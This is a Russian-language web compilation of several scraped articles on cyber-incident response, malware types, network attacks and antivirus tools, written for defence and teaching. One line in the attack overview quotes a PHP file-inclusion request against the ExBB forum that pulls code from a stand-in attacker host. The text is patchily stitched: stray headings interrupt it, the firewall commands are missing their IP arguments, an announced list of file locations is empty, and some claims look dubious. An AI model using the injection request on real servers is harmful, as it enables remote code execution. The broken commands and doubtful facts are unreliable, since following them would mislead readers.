Число кибератак стремительно растет: если раньше их количество исчислялось десятками в месяц, сейчас насчитывают тысячи инцидентов только за одну неделю: «Касперский» заявляет о 8-кратном увеличении числа DDoS-атак на российские организации. В то же время недавнее исследование SearchInform сообщает, что из 900 опрошенных ими компаний 95% ограничиваются только антивирусом в вопросах защиты от кибератак. В таких условиях вероятность столкнуться с инцидентом ИБ значительно выше, чем может показаться. Поэтому все же стоит отбросить сомнения, вроде «да кому наша информация нужна», и заранее разобраться, что делать, если инцидент уже случился.
Как понять, что инцидент случился?
Из очевидного: мониторить события безопасности антивирусов и межсетевых экранов. Помимо этого, стоит обратить внимание на эти пункты.
- Запуск ПО, неразрешенного к установке или запуску пользователям. Пример: если вы видите, что от имени учетной записи бухгалтера открыта сессия в powershell.execmd.exe, это повод для беспокойства.
- Неизвестный сетевой трафик. Пример: обращения узлов к несуществующим dns-серверам.
- Активная деятельность пользователя в нерабочее время.
- Подозрительная загруженность систем. Пример: аномальная загруженность процессора.
- Подозрительные изменения в реестре. Пример: добавление программ в автозагрузку.
- Сообщения о критической системной ошибке и перезагрузка систем. Это может свидетельствовать о попытках атаки на информационную систему компании.
- Аномальная работа с файлами и программами. Пример: появление зашифрованных файлов или установка стороннего ПО, копирование файлов на внешние носители.
- Подозрительное изменение настроек операционной системы, антивирусного и прикладного ПО. Пример: отключение антивируса на рабочем месте.
- Неизвестная активность на электронной почте. Пример: здесь все просто – спам.
- Аномалии в журналах авторизации. Пример: многократные попытки ввода неверных паролей.
Обнаружили кибератаку. Что дальше?
Сначала расставим приоритеты. Для этого нужно оценить уровень критичности скомпрометированных информационных ресурсов и технических средств: критичный, высокий, средний или низкий. От того, насколько серьезен ущерб, зависит количество времени, которое потребуется на расследование, и оперативность принятия решений.
ЭТОТ ВИРУС УБЬЁТ ТВОЙ КОМПЬЮТЕР!
Важный момент: если вы обнаружили кибератаку, ни в коем случае не отключайте технику от питания, это может привести к потере ценных индикаторов, необходимых для расследования, и сбою системы при запуске.
Теперь перейдем непосредственно к реагированию на кибератаку.
Этап 1. Изолируем скомпрометированный участок сети
В первую очередь, важно минимизировать количество скомпрометированных объектов инфраструктуры, ограничить дальнейшее продвижение злоумышленников по сети.
- Перенастроить правила на маршрутизирующем оборудовании (в случае вирусной атаки лучше сделать это так, чтобы остался доступ в интернет, а возможность добраться до других машин в локальной сети – нет. Это нужно, чтобы предотвратить самоуничтожение вредоносного ПО и всех следов, которые оно может оставить);
- Настроить правила на уровне межсетевого экрана операционной системы;
- Отключить сетевой кабель;
- Физически разорвать кабель (например, перерезать ножом, такой радикальный способ уместен, если нет быстрого доступа к портам технических средств; возможно, сервер находится в запертом на ключ шкафу).
Этап 2. Собираем свидетельства инцидента
Компьютерные вирусы и антивирусные программы.
На этом этапе важно сохранить как можно больше информации о состоянии инфраструктуры, составить отчет об инциденте и зафиксировать все данные. Это позволит использовать их в качестве юридически значимых свидетельств для привлечения злоумышленников к ответственности.
Что нужно собрать?
- Журналы событий безопасности установленных средств защиты информации. Это возможно, только если в них было настроено логирование событий.
- Журналы событий операционной системы (лог-файлы, даты созданиямодификации файлов). Это нужно, чтобы понять, какие действия в системе были совершены и в какое время: попытки авторизации, запуск приложений и изменение файлов.
- Дампы оперативной памяти, swap-раздела или pagefile.sys. Позволяет зафиксировать состояние системы в момент инцидента, чтобы можно было проанализировать его, пока система восстанавливается. Если вредоносная программа исполняется, не копируя себя на скомпрометированную систему, эти данные станут единственным доступным источником для расследования инцидента. Если же в систему проник вирус-шифровальщик, из оперативной памяти можно вытащить ключи шифрования для восстановления данных. Кроме того, дамп оперативной памяти покажет, какие действия совершал сотрудник в момент инцидента, это поможет доказать факт утечки данных.
- Трафик маршрутизаторов и коммутационного оборудования. Эта информация пригодится для определения источника инцидента, уязвимостей, через которые удалось атаковать инфраструктуру, и вектора распространения. В случае утечки, по логам трафика можно понять, какие файлы похитили.
- Посекторная копия физического диска. Полная копия диска компьютера со всеми журналами, пользовательскими и системными файлами – это возможность восстановить удаленные данные и изучить все связанные с потенциальным вредоносом файлы.
Этап 3. Восстанавливаем работу системы
Есть несколько способов это сделать. Все зависит от характера атаки и степени повреждения данных. При выборе метода не стоит забывать о трудозатратах и временных затратах, зачастую утраченная информация стоит меньше, чем потраченные на ее восстановление ресурсы.
Восстановление данных. Как это сделать?
- Применить ПО для восстановления удаленной информации. Покупать его может быть невыгодно для компании, стоит оно дорого. Поэтому, если бесплатные решения не смогли восстановить поврежденную информацию, целесообразнее будет обратиться к специалистам.
- Обратиться к специалистам по восстановлению данных.
- Воспользоваться резервными копиями. Самый надежный и простой вариант. Но для этого в компании изначально должно быть настроено резервное копирование.
Переустановка конфигурации рабочей станции
На автоматизированном рабочем месте сотрудника рекомендуется полностью переустановить систему и все ПО. Это сэкономит время и деньги на восстановление поврежденных данных.
Автоматизированные средства удаления вредоносного ПО
Если причиной инцидента стало вредоносное ПО, можно задействовать сканирование антивирусным программным обеспечением. Если такой возможности нет, используйте отдельные портативные решения, которые решат проблему точечно.
Этап 4. Расследуем инцидент ИБ
Лучше по этому вопросу обратиться сразу к специалистам. Чтобы качественно изучить кибератаку, нужно обладать пулом специальных навыков и знаний об устройстве операционных систем, типичных видах атак и их особенностях.
Когда станет понятно, что стало причиной инцидента и где нашлись уязвимости, важно заняться их устранением. Иначе все ресурсы будут потрачены впустую, и за этим инцидентом последуют еще десятки. Это может стать пятым этапом реагирования.
Теперь на практике
Ждать, пока у вас случится инцидент, чтобы проверить все эти этапы на практике, мы, конечно, не будем. Просто пройдемся по готовому кейсу для понимания
Инцидент: в систему попал вредоносный файл.
Этап 1. Изоляция скомпрометированного участка сети
Ограничиваем скомпрометированное техническое устройство от локальной сети с сохранением доступа к интернету: настраиваем либо межсетевой экран, либо коммутирующее оборудование. На ОС семейства Windows это можно сделать с помощью команды в netsh:
advfirewall firewall add rule name=»*TEMPORARY BLOCK*» dir=out protocol=tcp interface=any action=block remoteip=–
Для ОС семейства Linux можно воспользоваться межсетевым экраном iptables:
iptables -A FORWARD -s -d -j DROP
— сеть, в которой расположен сервер (например, 10.0.2.0/24),
– сеть, в которую запрещен любой доступ с сервера (например,10.0.0.0/24).
Этап 2. Сбор и сохранение информации для расследования инцидента
Первое. Делаем дампы оперативной памяти (можно с помощью Belkasoft RAM Capturer). Созданные дампы лучше скопировать на диск и сохранить. Его можно будет использовать для приобщения к материалам проверки и для проведения компьютерно-технической экспертизы. Упаковка диска должна быть такой, чтобы к нему невозможно было получить доступ без видимого нарушению.
Второе. Копируем лог-файлы. Для ОС семейства Windows мы делаем это так:
- Запускаем программу «Просмотр событий» (win+r, «eventvwr.msc»).
- Выбираем необходимый журнал и нажимаем кнопку «Сохранить все события как…» в окне «Действия».
Если так сохранить лог-файлы не получается, можно просто скопировать все файлы из папки «С:/Windows/System32/winevt/Logs».
Третье. Сохраняем файлы реестра «SYSTEM», «SOFTWARE», «SAM», «SECURITY» из папки «WindowsSystem32config» и «NTUSER.DAT» из домашней папки пользователя «Users\».
Четвертое. Сохраняем настроенные расширения браузеров. Их местоположения:
Для ОС семейства Linux нужно просто сохранить файлы из директории «/var/logs». Скопировать системные и недавно появившиеся/изменившиеся файлы.
Этап 3. Восстановление работы системы
В случае удаления данных:
- Самостоятельно восстанавливаем удаленные данные с помощью специальных программ.
- Делаем посекторный образ диска и отдаем на восстановление в специализированную лабораторию. Это пункт для тех, кто потерял информацию высокого уровня критичности.
- Восстанавливаем резервные копии, если они есть.
В случае шифрования данных:
- Обращаемся в компанию по разработке антивирусного ПО, которая может предоставить инструменты для противодействия конкретному виду шифровальщика. Если данные возможно восстановить, то скорее всего такая компания может предоставить дешифратор для файлов.
- При расследовании инцидента есть вероятность, что эксперты смогут помочь с дешифрованием файлов, если процесс реагирования на инцидент был последовательным и никакие данные не уничтожены.
Этап 4. Проводим расследование инцидента
Собираем все сохраненные данные и идем к сторонней компании, специализирующейся на расследовании инцидентов.
Этап 5. Устраняем причины инцидента
- обновление ПО до актуальной версии;
- обновление групповых политик на контроллере домена.
Источник: habr.com
информатика экзамен / 33 Вирусы и вирусные атаки
Чаще всего вирусами называют вредоносные программы, которые способны самостоятельно размножаться, создавая на компьютере свои копии или встраивая вредоносный код в уже имеющиеся на диске файлы без ведома пользователя.
Существуют и другие типы вредоносных программ, например трояны и сетевые черви. В большинстве случаев вредоносные программы несанкционированно проникают на компьютеры, выполняют деструктивные и нежелательные действия (удаление, искажение и блокирование информации), передают конфиденциальные и персональные данные злоумышленникам.
Многие специалисты отмечают, что в последние несколько лет основная доля вредоносных программ создается с целью получения прибыли и большая их часть относится к категории троянских программ, предназначенных для кражи персональных данных или блокировке компьютера.
Как защититься от вирусных атак
Как только появились первые вирусы, были разработаны противостоящие им программы – антивирусы. С возникновением новых методов проникновения, распространения, маскировки и их совершенствованием антивирусными специалистами осваивались новые методы обнаружения и противостояния вредоносным программам.
Для защиты компьютера от заражения вирусами и другими видами зловредов, конечно, необходимо установить антивирусное программное обеспечение.
Однако этого недостаточно для обеспечения стопроцентной защиты ПК, поскольку постоянно появляются новые угрозы, оперативно реагировать (даже постоянно обновляя базы) на которые антивирусы успевают далеко не всегда.
Чтобы предотвратить попадание вредоносной программы на компьютер, требуется быть очень внимательным и соблюдать правила безопасной работы на компьютере.
Классификация вредоносных программ
На данный момент не существует общепринятой классификации вредоносных программ и каждая компания, разрабатывающая антивирусный «софт», использует собственные критерии и наименования для определения вредоносного ПО.
Однако, учитывая современные тенденции развития вредоносных программ, зачастую достаточно трудно отнести обнаруженную угрозу к какой-либо определенной категории, поскольку в ней может быть предусмотрено сразу несколько способов распространения и она выполняет различные действия.
По способу распространения, проникновения и заложенному функционалу вредоносные программы делятся на несколько категорий.
Немного о вирусах
Главная особенность вирусов – способность самостоятельно размножаться на компьютере без ведома пользователя. В зависимости от модификации вирус может встраиваться в код других программ, установленных на ПК, или полностью заменять их.
Помимо этого, вирусы выполняют деструктивные действия: удаляют или искажают данные, намеренно нагружают систему, ограничивают доступ к файлам и пр.
Для предотвращения обнаружения вредоносных программ антивирусами создатели зловредов применяют специализированные алгоритмы шифрования кода, полиморфизма, стелс-технологии.
Заражение других компьютеров обычно происходит через различные переносные накопители – внешние жесткие диски, флэшки, оптические диски и пр.
Сетевые черви
Данную категорию вредоносных программ характеризует возможность самостоятельного распространения по локальной сети или в Интернете.
Для этого черви используют самые разнообразные методы и каналы обмена данными: электронная почта, сети обмена мгновенными сообщениями, сетевые ресурсы с общим доступом, уязвимости в ОС и программах и др.
Сетевые черви рассылают всем доступным для них компьютерам свою копию или, если это невозможно, ссылку на свою копию в Интернете, используя для этого различные послания интригующего содержания.
Для получения контактов вредоносная программа не только использует адресную книгу почтового клиента или IM-«мессенджера», но и может «прошерстить» всю систему на наличие необходимой информации. Кроме того, она может самостоятельно отвечать на входящие сообщения и др.
Например, сетевой червь Shadow.based (Kido) ведет себя так: После заражения он запускает HTTP-сервер, который в дальнейшем будет использоваться для копирования зловреда на удаленные ПК.
После этого компьютеры, к которым возможно получить доступ, атакуются с использованием одной из обнаруженных уязвимостей либо в ОС, либо в установленных программах. Затем на удаленные компьютеры загружается и устанавливается вредоносная программа.
Троянские программы
Вредоносные программы после внедрения в систему необязательно должны выполнять деструктивные действия. Вместо этого они могут собрать сведения о хранящихся на компьютере профилях пользователей, паролях и другую конфиденциальную информацию и затем переслать ее в руки злоумышленников.
Такое ПО обычно называют троянами или троянскими программами.
В некоторых случаях они не только просматривают хранящуюся на винчестере информацию, но и запоминают, на какие клавиши нажимает пользователь при работе с клавиатурой, фиксируя данные авторизации.
Такие троянские программы называются кейлоггерами. Еще один вариант действия вредоносной программы – предоставление злоумышленникам удаленного доступа к компьютеру, такое ПО называется бэкдор (от англ. backdoor – черный ход).
Нежелательные программы
Методы несанкционированного проникновения и невидимого присутствия в системе интересны не только злоумышленникам, но и организациям, занимающимся электронным маркетингом.
Это позволяет им рассказать о своих товарах и услугах миллионам пользователей, причем далеко не всегда с согласия последних.
Основное назначение программ этого типа, получивших название adware, – доставка и демонстрация рекламы в качестве компенсации разработчикам за бесплатное использование их программ.
Однако существуют рекламные системы, которые несанкционированно проникают на персональный компьютер за счет уязвимостей установленного программного обеспечения.
В этом случае в виде всплывающих окон появляются рекламные блоки или во время веб-серфинга постоянно открываются сайты, заходить на которые пользователь и не собирался.
Совместно с рекламными вредоносными программами могут использоваться шпионские приложения (spyware), которые собирают подробное досье на человека и компьютер. Полученная информация впоследствии применяется для организации целевой рекламы.
Источник: studfile.net
Вирусы и вирусные атаки
Вирусная атака — это покушение на удалённую/локальную вычислительную систему с использованием вредоносных программ (вирусов).
Вирусные атаки представляет собой более изощрённый метод получения доступа к закрытой информации, так как хакеры используют специальные программы для ведения работы на компьютере жертвы, а также дальнейшего распространения (это вирусы и черви). Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны.
Введение
Вирусные атаки и их виды.
Средства обнаружения вирусных атак.
Заключение
Работа состоит из 1 файл
- Вирусные атаки и их виды.
- Средства обнаружения вирусных атак.
Вирусная атака — это покушение на удалённую/локальную вычислительную систему с использованием вредоносных программ (вирусов).
Вирусные атаки представляет собой более изощрённый метод получения доступа к закрытой информации, так как хакеры используют специальные программы для ведения работы на компьютере жертвы, а также дальнейшего распространения (это вирусы и черви). Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны.
На данный момент вирусные атаки представляют серьезную угрозу для простых пользователей, не говоря уже и о крупных предприятиях, информация которых может иметь огромную ценность. Именно по этой причине организация и проведение вирусных атак представляет из себя целую индустрию, в которой заинтересованы не только злоумышленники (сетевые преступники), но и производители антивирусного ПО.
Мы, как простые пользователи ПК, должны знать, как защититься от вирусных атак, как не стать ее случайными участниками, а для этого нужно знать – что же такое вирусная атака, способы и методы их применения.
Вирусная атака — действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании.
Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом.
Пожалуй, один из самых распространенных типов атак в Интернете. Принцип данной атаки построен на использовании программных ошибок, позволяющих вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права.
В ходе такой атаки собственно не производится никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.
В ходе такой разведки злоумышленник может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей.
Также довольно распространённый вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемым сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.
Тоже распространённый вид атаки в недостаточно защищённых сетях, когда злоумышленник выдаёт себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого крэкеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений.
Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне злоумышленник может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки — кража или фальсифицирование передаваемой информации, или же получение доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации.
Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних команд или данных в работающую систему с целью изменения хода работы системы, а в результате — получение доступа к закрытым функциям и информации, либо дестабилизации работы системы в целом. Наиболее популярна такая атака в сети Интернет, но также может быть проведена через командную строку системы.
SQL-инъекция — атака, в ходе которой изменяются параметры SQL- запросов к базе данных. В результате запрос приобретает совершенно иной смысл, и в случае недостаточной фильтрации входных данных способен не только произвести вывод конфиденциальной информации, но и изменить/удалить данные. Очень часто такой вид атаки можно наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае — переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.
Вместо проверки можно подставить утверждение, которое будучи истинным позволит обойти проверку
PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный злонамеренный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости, как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом:
GET //modules/threadstop/ threadstop.php?new_exbb[home_ path]=evilhackerscorp.com/tx. txt. .
Межсайтовый скриптинг или XSS (аббр. от англ. Cross Site Scripting) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript. Другие названия: CSS, реже — скрипт-инъекция.
XPath-инъекция — вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных.
DoS (от англ. Denial of Service — Отказ в обслуживании) — атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своём коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.
DDoS (от англ. Distributed Denial of Service — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании.
DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.
Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм крэкера и ценность информации, а также недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения и недостаточное внимание к вопросам безопасности в компании в целом.
- Средства обнаружения вирусных атак.
На данный момент антивирусное программное обеспечение разрабатывается в основном для ОС семейства Windows от компании Microsoft, что вызвано большим количеством вредоносных программ именно под эту платформу (а это, в свою очередь, вызвано большой популярностью этой ОС, также как и большим количеством средств разработки, в том числе бесплатных и даже «инструкций по написанию вирусов»). В настоящий момент на рынок выходят продукты и под другие платформы настольных компьютеров, такие как Linux и Mac OS X. Это вызвано началом распространения вредоносных программ и под эти платформы, хотя UNIX-подобные системы всегда славились своей надежностью. Например, известное видео «Mac or PC» шуточно показывает преимущество Mac OS над Windows и большим антивирусным иммунитетом Mac OS по сравнению с Windows.
Помимо ОС для настольных компьютеров и ноутбуков, также существуют платформы и для мобильных устройств, такие как Windows Mobile, Symbian, iOS, BlackBerry, Android, Windows Phone 7 и др. Пользователи устройств на данных ОС также подвержены риску заражения вредоносным программным обеспечением, поэтому некоторые разработчики антивирусных программ выпускают продукты и для таких устройств.
Классификация антивирусных продуктов
Классифицировать антивирусные продукты можно сразу по нескольким признакам, таким как: используемые технологии антивирусной защиты, функционал продуктов, целевые платформы.
По используемым технологиям антивирусной защиты:
- Классические антивирусные продукты (продукты, применяющие только сигнатурный метод детектирования)
- Продукты проактивной антивирусной защиты (продукты, применяющие только проактивные технологии антивирусной защиты);
- Комбинированные продукты (продукты, применяющие как классические, сигнатурные методы защиты, так и проактивные)
По функционалу продуктов:
- Антивирусные продукты (продукты, обеспечивающие только антивирусную защиту)
- Комбинированные продукты (продукты, обеспечивающие не только защиту от вредоносных программ, но и фильтрацию спама, шифрование и резервное копирование данных и другие функции)
Эффективность системы обнаружения атак во многом зависит от применяемых методов анализа полученной информации. В первых системах обнаружения атак, разработанных в начале 1980-х годов, использовались статистические методы обнаружения атак. В настоящее время к статистическому анализу добавился ряд новых методик, начиная с экспертных систем и нечёткой логики и заканчивая использованием нейронных сетей.
Основные преимущества статистического подхода — использование уже разработанного и зарекомендовавшего себя аппарата математической статистики и адаптация к поведению субъекта.
Сначала для всех субъектов анализируемой системы определяются профили. Любое отклонение используемого профиля от эталонного считается несанкционированной деятельностью. Статистические методы универсальны, поскольку для проведения анализа не требуется знания о возможных атаках и используемых ими уязвимостях. Однако при использовании этих методик возникают и проблемы:
Источник: www.freepapers.ru
Информационная безопасность. Атаки и вирусы в производстве
Куйчогло, С. И. Информационная безопасность. Атаки и вирусы в производстве / С. И. Куйчогло. — Текст : непосредственный // Молодой ученый. — 2019. — № 45 (283). — С. 6-9. — URL: https://moluch.ru/archive/283/63797/ (дата обращения: 27.12.2022).
В данной статье мы рассматриваем информационную безопасность, для чего она нужна и с чем ей приходится бороться, Различные виды вирусов и к каким последствиям они могут привести, основные принципы борьбы со злоумышленниками.
Ключевые слова: информационная безопасность, вирусы, атаки, шифрование, мониторинг, злоумышленник.
Еще 50 лет назад компьютером считались огромные вычислительные машины, которые занимали огромное кол-во мест в помещении, основной целью которых было математическое вычисление.
В то время никто и подумать не мог что через некоторое время компьютер будет у каждого второго человека, и что на нем можно будет не только считать примеры, но также и играть, общаться, смотреть фильмы, хранить важные данные.
Вскоре встал вопрос, а как защитить свою информацию, ведь для каждого пользователя информация имеет определенную ценность. Тысячам пользователям рассылается спам и вредоносные программы, стоит лишь открыть документ и ваш компьютер теряет всю информацию, что влечёт к плачевным последствиям, для этого и была придумана информационная безопасность.
Истоки информационной безопасности
Отрасль информационная безопасность была придумана гораздо раньше вычислительной техники. Еще древние люди шифровали свою информацию разными символами или рисунками чтобы враги не могли понять, о чем данная информация говорится, самый известный метод шифрования был придуман еще во времена правления Гайя Юлия Цезаря, он назывался «шифр Цезаря». Суть его заключалась в том, что каждый символ в открытом тексте заменяется символом, находящимся на некотором постоянном числе позиций левее или правее него в алфавите. Таким образом, каждый символ смещается на определенное кол-во шагов. Но вскоре данные метод шифрования устарел и люди начали придумывать более сложные и логичные методы шифрования.
Вирусы
Вирусы в компьютере такой же как и вирус в организме, их главной задачей является нанесение ущерба здоровью, так же и вирусы в компьютере, они созданы для нанесения вреда функциональности устройства а так же кражи информации.
Зловредные программы появились еще задолго до появления «всемирной паутины», они распространялись благодаря физическим носителям данных, таких как диски, картриджи и т.д
В то время вирусы создавались для развлечения, как правило они не наносили особого ущерба ПК. Спустя некоторое время данное развлечение превратилось в хороший вид заработка, начали появляться целые компании по разработке вирусов, что привело к глобальным потерям информации.
Другой тип вредоносных программ является шифровальщик, после внедрения данной программы на ПК, устройство превращалось в «камень», в котором вся информация превращается в непонятный набор символов, как правило злоумышленник просит у пользователя деньги за то чтобы он восстановил всю информацию, но не факт, что он может это все сделать.
Так же есть такая вредоносная программа как «программы-зомби» если она попадет в ваше устройство, то мошенник получит удалённый доступ к вашему устройству. Это часто используется для того, чтобы рассылать спам для компьютерных атак, их так же называют DDoS атаки, когда огромное кол-во сетей посылают запросы на социальную сеть, почту, от того что они посылаются одновременно, сеть не выдерживает такие нагрузки, и прекращает свою работу.
Факты овирусах
По статистике, компьютер каждого второго пользователя Интернета хотя бы раз подвергался атакам компьютерных вирусов.
Первый компьютерный вирус создали в Пакистане, это были братья, которые создавали собственные программы и начали тайно вставлять вирус в свою продукцию, который начинал работать при попытке копирования.
Американские специалисты пришли к выводу, что борьба с компьютерными вирусами будет очень долгой. Потому что 40 лет назад интернет создавался исходя их двух критериев: открытости и гибкости, но не безопасности.
На сегодняшний день существует более 50 компаний по разработке антивируса. Более 5000 разработчиков занимаются проблемами компьютерных вирусов, изобретено более 300 различных антивирусных программ.
Вирусы могут находится в документах, вложениях в аудио и видеофайлах. Сейчас не осталось таких типов файлов, которые не могут быть заражены вирусом. Так же набирают обороты специальные вирусы, которые путешествуют между мобильными телефонами и другими устройствами, в которых используется программные обеспечения.
Каждый год проходит чемпионат мира по борьбе с вирусами. В 2014 году на данном чемпионате победу одержала россиянка, который показала лучший результат. Она обезвредил 9600 вирусов из 10000 возможных.
Универсального способа по борьбе со злоумышленником пока не найдено, но специалисты вкладывают все свои силы на то, чтобы данных вирусных программ становилось все меньше и меньше.
Информационная безопасность на отраслевых предприятиях
Киберпреступление распространилось на многие отрасли, в том числе н на промышленность.
Многие предприятия изучают вопрос безопасности информации. Сейчас предприятие — это совокупность сложных технических систем, безопасность которых играет огромную роль.
С одной стороны, автоматизация основных процессов несет большую пользу (повышает КПД предприятия), но с другой стороны, чем больше интеллектуальных элементов, тем больше потенциальных точек угроз.
Промышленные предприятия выделяют три основные причины, по которым у них возникают такие проблемы в основном у объекта энергетики. Это торможение производственного процесса в связи с оборудованием, вышедшего их строя из-за его неисправности или неправильного использования. Сбой в связи с человеческим фактором: ошибки работника, и наконец автоматизированная структура и современная подстанция — это большой объем разнообразных данных, поэтому возникает проблема масштабных данных, которые необходимо контролировать и работа с таким массивом также чревата проблемами.
Эти проблемы могут привести к тому, что злоумышленник может перехватить управление объектами энергосетях компаний, например, вирус Stuxnet, который полностью парализовал работу ядерного объекта по обогащению урана. Угрозы компании составляют не только хакеры и мошенники, а также и сотрудник, которому не понравилось отношение начальства к нему, и он умышленно решил навредить производству компании.
Чтобы избежать атак от злоумышленников представители информационной безопасности предлагают:
чтобы сотрудник имел доступ именно к определенной производственной зоне, тем самым он никак он не мог никак повлиять на остальные участки производства.
Мониторинг действий, часто возникают сбои и сложно узнать кто виноват в этом, потому что информация о действиях не сохраняется, которые предпринимали пользователи, решение этой проблемы состоит в фиксировании действий, которые предоставляет достаточно оперативно выявлять причины сбоев и оперативным путем найти решение данной проблемы.
Эти рекомендации помогут решить ряд задач. Например, для выполнения федерального закона об
«Энергоэффективности и энергоснабжении». Это повышение стабильности работы подстанции;
улучшение мониторинга состояния дел, увеличение эффективности использования ресурсов и их стабильность.
Вывод
Информация очень важна для успешного развития бизнеса и других дел, и поэтому она нуждается в хорошей защите. Особенно актуально это стало в бизнес-среде, где главное место занимают информационные технологии. Так как мы живем в эпоху цифровой экономики, без них рост компании просто невозможен.
Информация все чаще подвергается угрозам. Хакерские атаки, перехват данных по сети, воздействие вирусов набирают огромный темп, отсюда возникает большая потребность в информационной безопасности, которая может сохранить всю ценность информацию.
Основные термины (генерируются автоматически): информационная безопасность, вирус, информация, атака, ваше устройство, данные, злоумышленник, компьютер, проблема, программа.
Источник: moluch.ru